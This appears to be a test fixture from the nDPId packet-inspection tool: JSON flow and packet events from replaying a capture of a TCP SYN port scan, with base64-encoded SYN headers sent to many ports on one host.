-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1831,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1821,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1831,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1821,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsJQ8AADEG8mOsEAAIQA2GNIzSBA7dUoMYAAAAAGACCAAsgQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1832,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1822,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1832,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1822,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsOxEAADIG22GsEAAIQA2GNIzSB9jdUoMYAAAAAGACDAAktwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1833,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1823,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061155,"flow_last_seen":1278275061155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1236,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1833,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1823,"flow_packet_id":1,"flow_last_seen":1278275061155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061155,"pkt":"ACYLMQczACWzv5HuCABFAAAskNcAACgGj5usEAAIQA2GNIzSBNTdUoMYAAAAAGACBAAvuwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1834,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1824,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061157,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":85,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1834,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1824,"flow_packet_id":1,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061157,"pkt":"ACYLMQczACWzv5HuCABFAAAsAUAAAC4GGTOsEAAIQA2GNIzSAFXdUoMYAAAAAGACDAAsOgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1835,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1825,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061157,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1835,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1825,"flow_packet_id":1,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061157,"pkt":"ACYLMQczACWzv5HuCABFAAAsL9AAADcG4aKsEAAIQA2GNIzSCAHdUoMYAAAAAGACEAAgjgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1836,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1826,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061157,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1836,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1826,"flow_packet_id":1,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061157,"pkt":"ACYLMQczACWzv5HuCABFAAAsBAUAADcGDW6sEAAIQA2GNIzSGfbdUoMYAAAAAGACEAAOmQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1837,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1827,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061157,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1837,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1827,"flow_packet_id":1,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061157,"pkt":"ACYLMQczACWzv5HuCABFAAAsDuMAACoGD5CsEAAIQA2GNIzSA+\/dUoMYAAAAAGACDAAooAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1838,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1828,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061158,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1838,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1828,"flow_packet_id":1,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061158,"pkt":"ACYLMQczACWzv5HuCABFAAAsX6QAACgGwM6sEAAIQA2GNIzSBFTdUoMYAAAAAGACBAAwOwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1839,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1829,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061158,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":42510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1839,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1829,"flow_packet_id":1,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061158,"pkt":"ACYLMQczACWzv5HuCABFAAAsdbIAACYGrMCsEAAIQA2GNIzSpg7dUoMYAAAAAGACDACGgAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1840,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1830,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061158,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":465,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1840,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1830,"flow_packet_id":1,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061158,"pkt":"ACYLMQczACWzv5HuCABFAAAsxmUAADQGTg2sEAAIQA2GNIzSAdHdUoMYAAAAAGACBAAyvgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1841,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1831,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061158,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3128,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1841,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1831,"flow_packet_id":1,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061158,"pkt":"ACYLMQczACWzv5HuCABFAAAs+dgAADEGHZqsEAAIQA2GNIzSDDjdUoMYAAAAAGACCAAkVwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1842,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1832,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061172,"flow_last_seen":1278275061172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061172,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1842,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1832,"flow_packet_id":1,"flow_last_seen":1278275061172,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061172,"pkt":"ACYLMQczACWzv5HuCABFAAAsQg4AACsG22SsEAAIQA2GNIzSAnHdUoMYAAAAAGACEAAmHgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1843,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1833,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061172,"flow_last_seen":1278275061172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061172,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1843,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1833,"flow_packet_id":1,"flow_last_seen":1278275061172,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061172,"pkt":"ACYLMQczACWzv5HuCABFAAAsIHkAADAG9\/msEAAIQA2GNIzSCBHdUoMYAAAAAGACBAAsfgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1844,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1834,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32770,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1844,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1834,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAs7ucAACYGM4usEAAIQA2GNIzTgALdU4MZAAAAAGACDACsiQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1845,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1835,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1845,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1835,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAsKmoAACkG9QisEAAIQA2GNIzTFxfdU4MZAAAAAGACCAAZdQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1846,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1836,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1846,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1836,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAsv7wAACcGYbasEAAIQA2GNIzTBdbdU4MZAAAAAGACEAAitgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1847,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1837,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1847,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1837,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAsookAACUGgOmsEAAIQA2GNIzSC2jdUoMYAAAAAGACCAAlJwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1848,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1838,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1848,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1838,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAs3UgAADQGNyqsEAAIQA2GNIzSDmndUoMYAAAAAGACBAAmJgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1849,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1839,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5678,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1849,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1839,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAsLIAAADcG5PKsEAAIQA2GNIzSFi7dUoMYAAAAAGACEAASYQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1850,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1840,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1850,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1840,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAsXFUAACYGxh2sEAAIQA2GNIzSCi\/dUoMYAAAAAGACDAAiYAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1851,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1841,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1851,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1841,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAsfogAADoGj+qsEAAIQA2GNIzSBwndUoMYAAAAAGACDAAlhgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1852,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1842,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1852,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1842,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsn2oAAC4GewisEAAIQA2GNIzSD6HdUoMYAAAAAGACDAAc7gAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1853,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1843,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32775,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1853,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1843,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsISAAADgG71KsEAAIQA2GNIzSgAfdUoMYAAAAAGACBAC0hwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1854,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1844,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1854,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1844,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsj\/MAADgGgH+sEAAIQA2GNIzSAYXdUoMYAAAAAGACBAAzCgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1855,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1845,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3372,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 